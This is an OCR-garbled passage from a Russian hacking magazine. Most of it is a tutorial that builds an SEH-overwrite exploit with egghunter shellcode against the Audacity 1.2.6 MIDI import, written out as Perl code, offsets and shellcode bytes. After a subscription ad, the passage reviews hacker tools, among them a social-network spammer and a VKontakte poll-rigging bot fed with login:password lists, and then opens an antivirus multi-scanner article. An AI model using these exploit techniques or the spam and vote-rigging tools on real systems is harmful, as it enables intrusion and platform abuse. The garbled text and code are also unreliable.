ЕЩЕ ПАРА МОМЕНТОВ 

Использованием сдвоенного тэга (яйца) обусловлено еще и тем, что 
иггхантинг может найти сам себя (тэг в своем теле) до нахождения 
тэга, стоящего перед основным шеллкодом, и передать туда управле- 
ние, что нам не требуется. 

Так как мы используем 5СА5В, то необходимо отслеживать, чтобы 
флаг направления (В) был сброшен, иначе поиск будет проис- 
ходить в обратном направлении, что приведет к неправильной 
работе иггхантера и вылету процесса. Но такое бывает очень 
редко и исправляется добавлением команды сброса флага на- 
правления — СОЕ. 
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Описание: 



ассезз ѵіоіаііоп по адресу 41414141 . Смотрим — переполнение не 
самое удобное: ЕІР не перезаписали, адрес возврата тоже. Досту- 
пен лишь Е5І, искаженно — регистр ЕСХ. Стек кусочково загажен 
нашими А (см. выше и ниже]. Зато перезаписали 5ЕН (Ѵіеѵѵ - 5ЕН 
сЬаіп]. С нововведениями в винду защита исключений поднялась в 
разы, но для примера оно сойдет. Чудесно. Так, узнаем подробности, 
используя плагин к рѵебпбаббг. 

Создаем паттерн: 



! рѵеТіпсіасісіг раДДегп_сгеаДе 2 0 00 



Адреса для возврата в стек 

Поиск иггхантер производит по кругу, то есть после конца адресного 
пространства процесса он переходит в начало. Таким образом, если 
иггхантер не найдет тэг перед основным шеллкодом, то процесс 
конкретно зависнет в бесконечном цикле, забирая при этом 100% 
производительности проца. 

Кстати, в Еіпих-системах иггхантинг юзается ничем не хуже, чем под 
ѴѴіпбоѵѵз, и алгоритм аналогичен первому, разве что системные вы- 
зовы другие, да регистры. Подробнее можешь почитать в той же статье 
от зкаре. 

ПРАКТИЧЕСКАЯ ЧАСТЬ. ПРИМЕР. 



Длиннющую строчку, полученную из окошка лога([| или из файла 
ппзраІІегп.ТхІ: в папке ІттипіТу ПеЬиддег’а, пихаем в переменную 
$]ипк. Пересоздаем ТезТдго и перезапускаем эдитор в дебаггере 
(с1;г[+Е2|. 

Смотрим итог, используя функцию зиддезі, которая ищет в памяти 
первые 8 байт паттерна и выдает адреса, а также указывает, на что 
мы можем воздействовать (регистры, 5ЕН и т.д.І, и какое необходимо 
смещение. 

Ірѵе^іпсіасісіг зиддезД 

Можно узнать смещение и для конкретной части паттерна. 

К примеру, при переполнении 5ЕН перезаписался значением 
67413966, тогда смещение узнаем так: 



Коли мы уже определились в необходимости иггхантинга как метода, 
давай опробуем его и некоторые его возможности на практике. 
Признаюсь что пример — лабораторный, но чрезвычайно показатель- 
ный, а главное — доступный, но об этом — после. 

Для опытов мы воспользуемся звуковым редактором Аибаску. Версия 
с переполнением — 1 .2.6. Взять можно либо с оі'Іепзіѵе-зесигкѵ.сопп/ 
агсЫѵе/аибаскѵ-ѵѵіп-1 .2.6.ехе . либо с диска. Чтобы не повторяться 
— на диске есть все, о чем написано в данной статье, от ПО до всех 
вариантов эксплойтогенерилки. 

Инструментарий для препарирования — будем пользоваться Ітппипііу 
ВеЬиддег’ом с аддоном рѵебпбаббг от согеІапсОбЗг'а (от котором я 
писал в прошлом номере]. Взять отсюда — іттипііѵіпс.сот/ргобисіз- 
ітппбЬд.зЫппІ . либо отсюда — соге[ап.Ье:8800/іпбех.рЬр/5есигіІ:ѵ/ 
рѵебпбаббг-рѵ-іплтипіІѵ-беЬиддег-рѵсоппппапб/ . 

Для того, чтобы рѵебпбаббг заработал, пихай его в коробку с гвоздями. 
То есть в РуСотппапбз. 

Сам эксплойт будет создаваться посредством РегГа, так что под ѴѴіп — 
АсбѵеРегІ с асбѵезіаіе.сот/асбѵерегі . Личное пристрастие... 

Итак, к делу. Переполнение буфера возникает при импорте специаль- 
но сформированного МІВІ-файла в программе. Создаем файл с ААААА 
в 2000 байт. 

# ! /изг/Ьіп/регІ 

$ 3 ипк = "\х41" X 2000 ; #Буква А 2к раз 

$зр1оіД = $зипк; #Итоговый сплойт 

ореп(РІЬЕ, ">Цезк.дго" ) ог сііе "Саппок ореп Тііе: $!"; 

#Открываем файл на запись 

ргіпк РІЬЕ $зр1оік; #Пишем текст 

сІозе(РІЬР); #3акрываем 

ргіпк "кезк.дго каз Ьееп сгеакесі \п"; 



ІрѵеТіпсіасісіг раккегп_оТТзек 67413966 

Не буду вдаваться в подробности описания техники переза- 
писи 5ЕН, но напомню основные моменты. 5ЕН-запись в стеке 
состоит из двух 4-байтных адресов. Один из них — указатель на 
следующий обработчик исключений (пехіЗЕН], если данный не 
сработает, а второй — указатель на сам код, обрабатывающий 
исключение. При возникновении исключения программа пере- 
ходит по этому адресу. Но, так как нам нужно передать управле- 
ние на стек, то мы находим где-то в памяти последовательность 
инструкции рор, рор, геС тем самым избавляемся от лишних 
данных в стеке, появившихся после перехода на обработчик, и 
возвращаемся в стек. Так как пехіЗЕН расположен на вершине 
стека, то нам нужно перепрыгнуть запись об обработчике ис- 
ключения, что мы делаем, используя конструкцию \хеЬ\х06\х90\ 
х90. Первые два байта — джамп вперед на 6 байт (2 байта \х90 
(МОР] и 4 байта адреса на 5ЕН], то есть, за обработчик на наш 
шеллкод. 

Надеюсь, что понятное объяснение получилось, если что — смотрим 
рисунок :]. 

Итак, 5ЕН находится на 178 байте, пехі: 5ЕН — 174. Чудесно. 

Для того, чтобы найти необходимую последовательность «рор рор 
геі:», воспользуемся плагином еще раз. Для этого в нем есть несколько 
функций. Без параметров он ищет в памяти процесса данную последо- 
вательность со всеми регистрами. По функции «р» — поиск проис- 
ходит только для библиотек скомпилированных без заІеЗЕН, по «р1» 

— без заІеЗЕН и А5ЕР, «р2» — по всем. Итог смотри на скриншоте. 

ІрѵекіпсіасісЗг р 



Открываем Аибасііу в дебаггере и запускаем его (Е9]. Импортируем Полученный адрес, какты понимаешь, будету всех разный, так как 

в звуковой редактор (Проект-Импорт МІОІ]. И видим в дебаггере зависит он от версии, пака ОС. Так что подбери какой-нибудь. 
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► Об9 






взлом 



Разбор переполнения плагином рѵеЛпсІасІсІг 



ІхеЬІх0(>\х90\х90 
КеМ8ЕН 



ОхХХХХХХХХ 
8ЕН адрес 



Наш шеллкод 



1>ор XX 

рорхх 

геС 




Действие сплойтоВр перезаписывающих 5ЕН-записи 



$3ипк = "\х41"х174; # мусор в начале 

$ЗитрЫех^ЗЕН = " \хеЬ\х0б\х90\х90 " ; # джамп на б байт 
вперед 

$ЗЕН = раск ( "V" , 0х013е5423 ) ; # пакуем переход на рор 
рор геР 

$з1іе11 = "\х42"х200"; # тут будет шеллкод, а пока 
буква В 200 раз 

$зр1оіР = $ зипк . $ ^итрNеxРЗЕН . $ЗЕН . $зке11 ; 

Генерим, импортируем. На ошибке проверим полученный 5ЕН-адрес: 

1. Ѵіеѵ^ — ЗЕН скаіп; 

2. Правой кнопкой на нашем адресе — Ео11оѵ\? Пабіег. 

Должна быть запись рор, рор, гек Если так, то ставим на первом рор'е 
брэйкпоинт — Е2 (либо сразу в окне 5ЕН сбаіп). 5Ыб:+Е9, чтобы про- 
должить выполнение программы. 

Программа должна остановиться на рор. Теперь пошагово (Е7) до- 
ходим до геі; и возвращаемся на МехіЗЕН, он же — джамп на 6 байт. 
Далее наш шеллкод — много «В». 

Теперь смотрим, хотя наш псевдошеллкод и на месте, но размер его 
— никак не 200 байт. Там всего 72 байта. Мало. Если посмотреть выше 
и ниже по стеку, то мы также найдем куски сплойта. Можно, конечно, 
заморочиться и собрать... но ближе к иггханту. 

Подставим какой-нибудь реальный шеллкод в сплойт и поищем его в 
памяти процесса. 

Отдельно сохраняем шеллкод, перезапускаем эксплойт и ищем в 
дебаггере: 

# ! /изг/Ьіп/регІ 

$зПе11= " \хеЬ\хОЗ \х5а"; # какой-то шеллкод 

ореп(ЕІЕЕ, ">з1іе11") ог біе "Саппок ореп кііе: $!"; 
ргіпк ЕІЕЕ $з1іе11; 
сіозе (ЕІЕЕ) ; 

ІрѵеТіпбаббг сотраге с : \едд\зПе11 

Появится окошко, где перечислены все участки в памяти про- 
цесса с нашим шеллкодом и отметкой, изменено ли в них что-то. 

В логе указывается, что именно изменилось. Это бывает полезно 
для вычисления бажных символов. В нашем сплойте получается 
три варианта, обрезанных с 73 символа, и один нормальный. Но 
место его меняется при перезапуске проги, и регистры на него не 
ссылаются, то есть по-простому на него не перейти. Потому ис- 
пользуем иггхант-шеллкод в этих 72 байтах, который и основной 
код найдет, и управление ему передаст. Добавляем: 



# Яйцо перед основным шеллкодом 
$кад= " \х77\х30\х30\х74 " ; 

# ЫЕАссеззСкеск хантер с яйцом в теле 

$едд1іипкег = " \хбб\х81\хСА\хЕЕ\х0Е\х42\х52\хбА\х02\ 
х58\хСВ\х2Е\хЗС\х05\х5А\х74\хЕЕ\хВ8" . $кад . "\х8В\ 

хЕА\хАЕ\х75\хЕА\хАЕ\х75\хЕ7\хЕЕ\хЕ7 " ; 

# Сдвигаем основной шеллкод из стека 
$3ипк2= " \х90 "х50 ; 

# Кучкуем итог 

$зр1оік = $з'ипк. $зитрЫехкЗЕН. $ЗЕН. $еддкипкег . $зипк2 . 
$кад . $кад . $з1іе11 ; 

$]упк2 требуется, так как иггхантер меньше доступного буфера в 73 
байта, потому мы должны сдвинуть основной шеллкод, чтобы его 
начальные куски (тэги) не были раскиданы по памяти, и не произо- 
шло ложное нахождение. В общем-то, все. Управление передается 
через 5ЕН, иггхантер ищет основной код и передает ему контроль. 
Юзая данный пример, можно хорошенько проследить за поведением 
хантера и увидеть то, что было описано в теоретической части данного 
эпоса. Например, обнулить ЕВХ(\хЗЗ\хВ2) в начале и посмотреть на 
скорость нахождения основного шеллкода. Кстати, работу иггханта 
можно увидеть по возрастанию количества «ошибок страниц» в Дис- 
петчере задач. 

Но оставлю это на личную инициативу. Хотя вот пара ссылок: 

Пример от согеІапсОбЗг'а: согеІап.Ье:8800/іпсІех.рбр/2010/01/09/ехр[оі1:- 
ѵѵгіЦпд-ІиІогіаІ-рагІ-В-ѵѵіпЗЗ-едд-ЬипЦпд/ . 

Пример иггхантера в М5Е: оі'і'епзіѵе-зесигііѵ.сопп/ппеіазріоіі:- 
цпіеазбеб/ и иггхантер-шеллкод с поиском только по куче: гООбп. 
Ыод5роЕсот/2009/03/беар-оп[у-едд-бип1:ег.Ы:пп[ 

ТИПА, ЗАКЛЮЧЕНИЕ 

Иггхантинг— крутой метод. Это точно. И простой, и рабочий. 
Приведенный пример, конечно, не жизненный, поэтому хочу привести 
пару иных примеров. Они, к сожалению, для изысканий недоступны, 
так как являются платными продуктами, зато это прибавляет крутости 
методу. К примеру, «Мегсиг Меззадіпд 2005» ІМАР-сервер. 

Имеет переполнение буфера в обработке команды 
50В5СВІВЕ(СѴЕ-ІВ: 2007-1579). В стандартном эксплойте доступ- 
но 224 байта для рауіоаб’а. С использованием техники иггхан- 
тинга, мы можем предварительно послать более вместительную 
команду ЕІЭТ с основным шеллкодом, а это уже 2 Кб. Или МсАІее 
еРоИсу О ГС б езі: га Іо г 3.5.0. Переполнение дает 140 байт, а с иг- 
гхантером — неограничено. 

В общем-то ясно, что многие эксплойты можно улучшить, если приме- 
нить к ним данный метод. Так что радуемся новым знаниям и спешим 
проверить их на практике :). 



► 070 
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ВЫГОДА*ГАРАНТИЯ*СЕРВИС ЭТО ЛЕГКО! 




БУДЬ УМНЫМ! 

ХВАТИТ ПЕРЕПЛАЧИВАТЬ В КИОСКАХ! 
ПОКУПАЙ ЖУРНАЛ В 3 РАЗА ДЕШЕВЛЕ! 



А5Л. 

ш 






Замучился искать журнал в палатках и мага- 
зинах? Не хочешь тратить на это время? Не 
надо. Мы сами потратим время 
и привезем тебе новый выпуск X. 

Для жителей Москвы (в пределах МКАД) 
доставка может осуществляться 
бесплатно с курьеоом из рук в руки 
в течение трех раоочих дней с момента 
выхода номера на адрес офиса или 
на домашний адрес. 

Еще один удобный способ оплаты 
подписки на твое любимое издание — в любом 
из 72 000 платежных терминалах ОІѴѴІ (КИВИ) 
по всей России. 



ЕСТЬ ВОПРОСЫ? Звони по бесплатным телефонам 
8(495)780-88-29 (для москвичей) и 8(800)200- 
3-999 (для жителей других регионов России, 
абонентов сетей МТС, БиЛайн и Мегафон). 

ВОПРОСЫ, ЗАМЕЧАНИЯ И ПРЕДЛОЖЕНИЯ ПО ПОДПИСКЕ НА 
ЖУРНАЛ ПРОСИМ ПРИСЫЛАТЬ НА АДРЕС 1пТо1а)д1с.ги 






ПОДПИСКА 
ПА 6 МЕСЯЦЕВ 
г ПО ЦЕНЕ 

540 руб. 






1. Разборчиво заполни подписной купон и 
квитанцию, вырезав их из журнала, сделав 
ксерокопию или распечатав с сайта 
зітор.діс.ги . 

2. Оплати подписку через любой банк. 

3. Вышли в редакцию копию подписных доку- 
ментов — купона и квитанции — любым из 
нижеперечисленных способов: 

• по электронной почте $иЬ$сгіЬе@дІс.ги; 

• по факсу 8 (495) 780-88-24; 

• по адресу 119021, Москва, 

ул. Тимура Фрунзе, д. 11, стр. 44, 

ООО «Гейм Лэнд», отдел подписки. 

ВНИМАНИЕ! 

Подписка оформляется 
в день обработки купона и квитанции 
с номера, выходящего через один 
календарный месяц после оплаты. 

Например, если произвести оплату в июле, 
то подписку можно оформить с сентября 






СТОИМОСТЬ ЗАКАЗА С ДОСТАВКОЙ: 

2200 РУБ. ЗА 12 МЕСЯЦЕВ, 1260 РУБ. ЗА 6 МЕСЯЦЕВ 

Единая цена по всей России. Доставка за счет издателя, в том 
числе курьером по Москве в пределах МКАД 

СТОИМОСТЬ ЗАКАЗА БЕЗ ДОСТАВКИ, С получением журнала само- 
стоятельно в Москве в точке продаж Р-кіозк рядом с метро 
Белорусская, ул. Грузинский вал, д. 27-31 : 

540.00 РУБ. ЗА 6 МЕСЯЦЕВ! 

Получить журнал можно будет у продавіда с предъявлением пас- 
порта на имя оформившего подписку, в течение недели, начи- 
ная со следуюідего дня, после выхода журнала. 



ПОДПИСНОЙ КУПОН 

ПРОШУ ОФОРМИТЬ ПОДПИСКУ 
НА ЖУРНАП « 



□ на 6 месяцев 

I I на 12 месяцев 

начиная с 20 г. 

I — I Доставлять журнал по почте 
' — ' на домашний адрес 

Доставлять журнал курьером ■ 

□ на адрес офиса* 

I I на домашний адрес** 

□ Самостоятельное получение 

(отметь квадрат выбранного варианта подписки) 

Ф.И.О. 



АДРЕС ДОСТАВКИ; 

индекс 

область/край 

город 

улица 

дом КОРПУС 

квартира/офис 

телефон ( ) 

е-таіі 

сумма оплаты 

*в свободном поле укажи название фирмы 
и другую необходимую информацию 
**в свободном поле укажи другую необходимую информацию 
и альтернативный вариант доставки в случае отсутствия дома 

свободное поле 



Извещение 



ИНН 7729410015 ООО «Гейм Лэнд» 

ОАО «Нордѳа Банк», г. Москва 

р/с N° 40702810509000132297 



к/с № 30101810900000000990 



БИК 044583990 




КПП 770401001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 
Оплата журнала « 


» 


Сумма 


с 


20 г. 





Ф.И.О. 



Кассир 



Подпись плательщика 



Квитанция 



ИНН 7729410015 



ООО «Гейм Лэнд» 



ОАО «Нордѳа Банк», г. Москва 
р/с Мо 40702810509000132297 



к/с № 30101810900000000990 



БИК 044583990 




КПП 770401001 


Плательщик 


/\дрес (с индексом) 


Назначение платежа 
Оплата журнала « 


» 


Сумма 


с 


20 г. 





Ф.И.О. 



Кассир 



Подпись плательщика 






Х-Т0018 

ПРОГРАММЫ ДЛЯ ХАКЕРОВ 




Программа: АТС Рііе ѴѴірег 
ОС :ѴѴіпсІоѵѵ5 2000/ХР/2003 Зегѵег/ 
ѴІ5іа/20085егѵег/7 
Автор: АІехТИеСОсІЗг 




Интерфейс вайпера 



Представь, что тебе нужно полностью удалить 
какую-либо информацию с компьютера. Причем 
удалить так, чтобы никакимитехническими 
средствами ее уже нельзя было восстановить. 
Такой трюк можно проделать с помощью мно- 
гократной перезаписи файлов случайными 
значениями, для чего и были придуманы специ- 
альные программы — вайперы. Один из самых 
функциональных вайперов сегодня представлен 
на страницах нашей рубрики. 

Итак, АТС Рііе ѴѴіреготмембера Античата 
АІехТЬеСОсІЗг'а предлагает тебе два режима 
работы: 001 и консоль. 

Функционал программы следующий: 

• Возможностьсохранитьсписокпапокв файл (в 
папку с программой]; 

• Возможностьдобавления папки, указанной в 
списке папок, кнопкой «<»; 

• Поддержка русского языка (смена языков 
правым кликом мышкой в форме); 

• Функция чистки логов ѴѴІПСІ0\Л/5; 

• ЗапускООІ из консоли с параметрами пути до 
файла и количеством циклов перезаписи: 

е : \Ргодгат Рі1ез\АТС\ѵ^ірегдиі . ехе 
"В: \рарка_(і1уа_усіа1епіуа" 15); 

• Запускпрограммы с параметром начального 
пути до папки: 



Е : \АТСТі1еѵ7Ірег . ехе "е : ХсіоѵяіІоасізХ 
рарка_сі1уа_у(іа1епіуа " 

• Удаление всех файлов из папки (плюс функция 
удаления самих папок); 

• Перезапись всех файлов в папке случайными 
значениями и последующее ихудаление; 

• Перезапись всех файлов в папке случайными 
значениями в несколько циклов и последующее 
ихудаление. 

Пример составления списка файлов на удале- 
ние в режиме «ехІгаСІеап»: 



В: \ѵазуа\* . ехе 

С : \(Тоситепкз агкТ зеккіпдз\А(1тіп\Му 
ВоситепкзХ* . * 

С : ХМуРгодз \ * . раз 
С : \покіа \ 3 ігпт. * 



Здесьты указываешь полные пути до папок и 
маски файлов, которые надо удалить с переза- 
писью ихзначений. 

Если тебе нужно удалить папку, в которой есть 
другие папки,то сначала указывай путьдо вло- 
женных папокв иерархическом порядке (чтобы 
вложенные папки были выше). 

Таккаквайпер постоянно обновляется, ис- 
правляются баги и появляются новые функции, 
советую внимательно следить за обновлениями 
программы в топике бир5:/Логит.ап1:ісЬаЕги/ 
5бо\л/ро5ЕрЬр?р= 1898379 . 



Программа:ѴѴеЬОіг5саппег 
ОС : ѴѴІПСІ0ѴѴ5 2000/ХР/2003 Зегѵег/ 
ѴізІа/2008 5егѵег/7 
Автор: 0x00 




Работа сканера 



На очереди очередная программа для скани- 
рования веб-директорий по списку из файла. 
На этот раз — ѴѴеЬОігЗсаппеготмемберауже 
знакомого тебе портала ѵѵеЬхакер.пеЕ 0x00. 
Какты уже понял, прога представляет собой 
сканер файлов и директорий на удаленном 
сервере. 

Особенности: 

• Сканитвсеуказанныетобой имена из файла 
біг.ІхЦ 



• Использует прокси; 

• Работает на основе метода ловли ошибок 
веб-сервера; 

• По окончании работы записывает результат в 
файл окз.іхі; и лог в файл Іод.іхі; (формат^ "стро- 
ка: ответ сервера"); 

• Показывает количество просканированных 
директорий и процентуже пройденного скани- 
рования; 

• Работает на .Меі: РгатеѵѵогкЗ.О и выше. 

В прилагаемый к программе список для скана 
уже включены некоторые самые распро- 
страненные локации «интересных файлов», 
например: 

(бтіпі .ркр 
аскпіпі . кСтІ 
а(1тіп2 . ркр 
а(1тіп2 . кСтІ 
уопекіт. ркр 
уопекіт. крті 
уопекісі .ркр 
уопекісі .крті 
аскп/ 
аскпіп/ 

аскпіп/ассоипР . ркр 
асітіп/ассоипР . крті 
аскпіп/ іпсіех . ркр 
асітіп/ іпсіех . крті 
аскпі п / 1 од і п . ркр 
аскпіп/іодіп. кСтІ 
аскпіп/ііоте . ркр 
асітіп/сопргоірапеі . крті 
асітіп/сопргоірапеі . ркр 
асітіп . ркр 
аскпіп.крті 
аскпіп/ср .ркр 
аскпіп/ср . крті 
ср . ркр 

Любые отзывы и пожелания автор просит 
направлять прямиком в топик ѵѵеЬхакер.пеІ:/ 
Фгит/5ЬоѵѵІ:ЬгеасІ.рбр?І:=5201 . 

Программа: АгхОгаЬЬегЗіІе 
ОС: ѴѴіпгіоѵѵз 2000/ХР/2003 Зегѵег/ 
ѴІ5(а/2008 Зегѵег/7 
Автор: АгхѴѴоІ^ 

Не могу удержаться, чтобы не представить 
тебе очередную интереснейшую программу 
от команды вебхакера — граббер сайтов 
АгхбгаЬЬегЗіІе. 

Эта прога поможеттебе разобрать любую веб- 
страницу на части, то есть извлечь нужные 
тебе данные. 

Для парсинга страниц в программе исполь- 




! ^ 



/ 






ХАКЕР 08 /139/ 10 



► 072 







Граббер сайтов 



зуются регулярные выражения, аналогичные 
тем, которые применяются в РНР: 



Етаіі: [_а-2А-2\сі\-\ . ] +@ [_а-гА- 
2\сі\-] + (\. [_а-2А-2\(і\-]+) + 
икЬ: (?і)1ігег=("|#39|) (1іССр://|}і 
ССрз : // I ^Ср: // ЩРВ: / /) ( [_а- 

2 \сі\-] + (\. [_а- 2 \сі\-]+)+) ( (/[ _а- 
2\сі\-\\\. ?=&%://]+)+)* 

ВЗ : <зсгірр ( ['^>]*?)>(.*?) </зсгірР> 



Основной функционал программы: 

• Извлечение етаіі-адресов; 

• Извлечение ССЫЛОК; 

• Извлечение ЗаѵаЗсгірІ:; 

• Извлечение описания страницы; 

• Извлечение кейвордов страницы; 

• Возможность создать свое правило регуляр- 
ного выражения; 

• Вывод исходника страницы. 

Любые предложения и пожелания направляй 
прямиком АгхѴѴоІГѵ в ѵѵеЬхакер.пеІ: Логит/ 
5ЬоѵѵІ:ЬгеасІ.рІір?І:=4850 . 







Программа: 50а1ахуѵ0.7 

ОС : ѴѴіпсІоѵѵБ 2000/ХР/2003 Зегѵег/ 

ѴІ5іа/20085егѵег/7 

Автор: РІМѲЕР 

Далее хочу познакомить тебя с несколь- 
ко специализированной программой 
— спамером популярнейшей мобильной 
социальной сети «Галактика знакомств» 
[ ]аѵада[а.ги ). 

Спамерумеетспамить и флудить следующим 
образом: 

• в приват; 

• комментариями в блог; 

• комментариями в фотоальбомы; 

• в журнал клана; 

• в приглашения клана; 

• в функции добавления друга; 

• в объявлениях о знакомства; 

• по етаіі. 

Также имеются возможности совершать весь 
спам и флуд одновременно, отключать и 
включать любые пользовательские опции и 
выставлять задержку на посылаемые сооб- 
щения. 

С программой можно работать с помощью 
следующих команд: 



О — отправка сообщений о добавлении в 
друзья с одного профиля; 



1-5 — простая отправка сообщений с 
1-5 профилей; 





Спамер мобильной социалки 

911 — постучаться модератору в анке- 
ту; 

922 — пригласить в клан; 

999 — флуд в журнал клана; 

933 — оставить комментарий в блоге; 
111 — запостить объявления о знакомо - 




Накрутчик опросов ВКонтакте 

[ОРТІОЫ] бйе Ьезб! |Я голосую за 
[ОРТІОЕ] I [ОРТІОЫ] и только он! 

В ходе работы программа будет рандомно вы- 
бирать мессагу из списка сообщений, которые 
разделены знаком "1", а в тему будет отправлено 
одно из таких сообщений: 



тве; 

1000 — отправить комментарии к фото- 
графии; 



Борис Моисеев Щте Ьезб ! 

Я голосую за Борис Моисеев 
Борис Моисеев и только он! 



222 — спам на етаіі; 

40 — спам в приват с одного профиля 
без дополнительных действий; 

50 — спам и флуд во всех действиях. 



Каквидишь, вседо безобразия просто. Каквсег- 
да, любыеотзывы и предложения направляй 
прямиком авторувтопик Шр5:/Логит.ап1:1сЬа1:. 
гиЛЬгеаб! 94387. Ыті . 



Надеюсь, ты не слишком сильно надоешьадми- 
нам Галактики :) 

Программа: ѴКѴоТеР 
О С : ѴѴіпсІоѵѵз 2000/ХР/2003 Зегѵег/ 
ѴІ5»а/20085егѵегЛ 
Автор: таіІЬгизІі 

А вот и еще одна крайне полезная утилита для 
твоей любимой социальной сети — ѴКѴоТеВ — 
накрутчикопросов ВКонтакте отантичатовца 
таіІЬгизб. 

Если ты принимаешь участие в опросе попу- 
лярной группы, ноникакне можешь набрать 
необходимое количество голосов, то данная 
программа поможеттебе в этом нелегком 
деле. С помощью нее ты сможешь в несколь- 
ко кликов накрутить голоса в указанном 
запросе. 

Принцип работы проги прост: 

1 . Указывай ссылку на опрос; 

2 . Выбирай вариант ответа; 

3 . Вставляй или загружай аккаунты ВКонтакте 
(свои, конечноже :) 

Далее каждый поток программы по очереди 
будет брать по одной паре "логин:пароль" из 
составленного тобой списка и авторизоваться 
под ней. 

Затем под текущим аккаунтом накрутчик 
вступаете группу, в которой находится опрос, и 
голосует по указанномутобой варианту. 

Также опционально программа может отписать- 
ся втеме. 

Основныефичи программы: 

• Работа с проксями; 

• Возможность использовать макрос [ОРТІОМ] 
дляуказания значения варианта ответа; 

• Рандомизация сообщений, которые раз- 
деляются указанным тобой сепаратором. К 
примеру, ты голосуешь за значение #8 в теме, 
а текст значения — «Борис Моисеев», значит 
в поле «Сообщения» ты должен указать 
следующее: 



Программа: 5иі.гиРіІеІІрІоа(1ег 
0С:ѴѴіпгіоѵѵ5 2000/ХР/2003 Зегѵег/ 
ѴізІа/20085егѵег/7 
Автор: зІезЬ 




Быстрая закачка файлов в обменник 



Завершаетнаш сегодняшний обзорудобнейшая 
утилитка, которая позволиттебе очень быстро и 
удобно залить файл на обменникзііі.ги. 
Пользоваться программой можнодвумя разны- 
ми способами: 

1 . Просто запускай и выбирай файл для закачки; 

2 . Кидай ее в одну из директорий: 

2000, ХР, 2 003 — С : ХВоситепбз апб 
Зеббіпдз\<Имя Пользователя>\ЗепбТо\ 
Ѵізба, 7 — С : \Бзегз\<Имя Пользова- 
теля>\АррВаба\Коатіпд\МісгозоГі:\ 
Шіпбоѵ\[3 \ ЗепбТо \ 

и выбирай любой файл, кликнув по нему правой 
кнопкой мыши. Далее в пункте «Отправить» 
выбирай «зііі.ги». 

Характеристики проги: 

• Закачка одного любого файла за один раз; 

• Отображение прогрессбара; 

• Компактный дизайн и возможность скопиро- 
вать загруженный файл сразу в буфер обмена; 

• Написан на Си (ѴѴіпАРІ +ѴѴіп5оск); 

• Чистый размер —7680 байт. 

Сам автор советует юзать второй способ для 
закачки файлов в обменник. ^ 





Л- 
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МАІѴѴАКЕ 




СВОИМИ руками 

Создаем публичный сервис для проверки файла 
несколькими антивирусами 



Недавно я прочитал статью Криса Касперски, посвященную ѴігизТоІаІ'у, 
и всерьез загорелся идеей созданием такого сервиса. Почему бы и 
нет? Проблема малвари сейчас стоит довольно остро, а необходимость 
проверки одного, но весьма подозрительного файла появляется у 
пользователей с завидным постоянством. 



МАТЕРИАЛЫ и МЕТОДЫ 

Итак, что же нам нужно? Рассмотрим по пунктам. 
• Выделенный сервер. Не Ѵ05, а именно 
□есіісаіесі. Я успел отхватитьсебе сервакс Соге 
□ ио, 2 Гб РАМ и безлимитным трафиком (10 
Мб/с) за $100 в месяц. Средниеже расценки 
сейчас заметно выше :). 



• Опыт работы с Ыпих — в качестве платформы 
я выбрал именно эту ОС, поскольку виндовый 
(особенно — высоконагруженный) сервер 
кажется мне не очень хорошей идеей. Лично я 
выбрал ОЬипШ Зегѵег 10.04. 

• Знание С++/ОГ Писать мы будем именно на 
нем, поскольку для линукса приплюснутый Си 



вполне логичен, а Оія выбрал, потому что в нем 
естьоченьудобные классы для взаимодейст- 
вия с процессами. 

• Знание РНР + АОАХ. Ну а как иначе? 

• Умение верстать/рисовать, либо человек, 
который это сделает. Без хорошего дизайна 
сервис долго не проживет. 



► 074 
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Разбор вывода антивируса 



• Установочные пакеты антивирусов и дипломатические 
навыки для общения с антивирусными компаниями. 



ПЕРЕЙДЕМ к ПРАКТИКЕ 

Набросаем небольшой план. Что должна делать наша 
софтина? Она запускает консольный сканер антивируса, 
читает и парсит его зЫ о иН Чтобы понять стиль поведения 
антивируса, запустим его с параметром --Ьеір, внима- 
тельно вкурим в результат, а затем скормим ему здоро- 
вый и зараженный (поочередно, естественно) файлы и 
сравним вывод антивируса. Как это будет реализовано в 
софте? 

Кактебеуже известно (если ты читал мою статью в майском 
][), в 01: есть очень полезный класс СРгосезз, который 
служит для запуска внешних программ. Он умеетзапускать 
программу, получать ее вывод и сообщать нам о заверше- 
нии программы. Но нам этого недостаточно, поэтому мы не- 
много допишем класс. Что будет в новом классе? Он должен 
собирать выведенный в консольтекст по мере его поступле- 
ния и генерировать сигнал с этим самым выводом и именем 
процесса при его завершении. Сказано — сделано: 



сіазз САѵРгосезз : риЫіс СРгосезз { 
ѵоісі іпііпе зСагСРгосезз ( 

сопзС СЗСгіпд &пате, 
сопзС СЗСгіпдЬізІ: &рагатз) ; 



зідпаіз : 

ѵоій опАѵРіпізІіесі (САѵРгосезз *зепсіег, 




Разработка РНР-части 



сопзС ОЗРгіпд &аѵ, 

СЗРгіпд &оиРриР , 
сопзС іпС ехіРСосіе) ; 
ргіѵаСе зІоСз : 

ѵоісі опРіпізІіесі ( ІПІІ ехіРСосіе, 

СРгосезз: : ЕхіСЗСаСиз ехіСЗРаРиз) ; 
ѵоісі опКеасіуКеасі ( ) ; 

}; 



Как видишь, класс наследуется отОРгосезз. Рассмотрим 
методы и слоты этого класса: 




> ѵѵагпіпд 

Не используй 
нелицензионные 
версии антивирусов 
в своем сервисе и не 
хостись в России. 



ѵоісі САѵРгосезз : : зРагРРгосезз ( 
сопзС СЗРгіпд &пате, 
сопзС СЗРгіпдЬізР &рагатз) 

{ 

СРіІеІпіо іпіо(пате) ; 
аѵЫате = іпіо . ііІеЫате ( ) ; 
зРагР(пате, рагатз) ; 

} 

Как нетрудно догадаться, этот метод служит для запуска про- 
граммы и сохранения имени процесса перед запуском. Код, 
заключенный в слотопКеасіуКеасі, просто аппендит про- 
читанный вывод куже имеющемуся, а слотопРіпізІіесі ( ) 
генерируетсигнал етіс опАѵРіпізІіесі (СЬіз , аѵЫате, 
аѵВиііег, ехіРСосіе) . Всетривиально, поэтомуя предла- 
гаю двигаться дальше, к главному классу: 




РЕ5РЕСТ 
Группе И-3-1 
(Прикладная 
Математика) МГТУ 
«Станкин». 

□ іеНагб, УаезН, ппеіаі 
АзесЬка.Ри сот- 
типКу 



Наш сервис в работе 




льтят 


2опег АѴ 


ряол 


|е5ет моозг 


а ѵагіапі оіГ Ѵ!/і п 11/ Р5ѴУ. ЫР1 пс И 
Ігоіап 


ВіШеІегкІег 


|(атгі с . Віаіег. 7С52А691 


І5орПо5 


ТгоЗ/ЫРпсИ-Сеп 


АѴС 


ІТгоіап Гіогз€ Р5\Ѵ.ЫрІгкЬ.ОВР 


ІСІатАѴ 


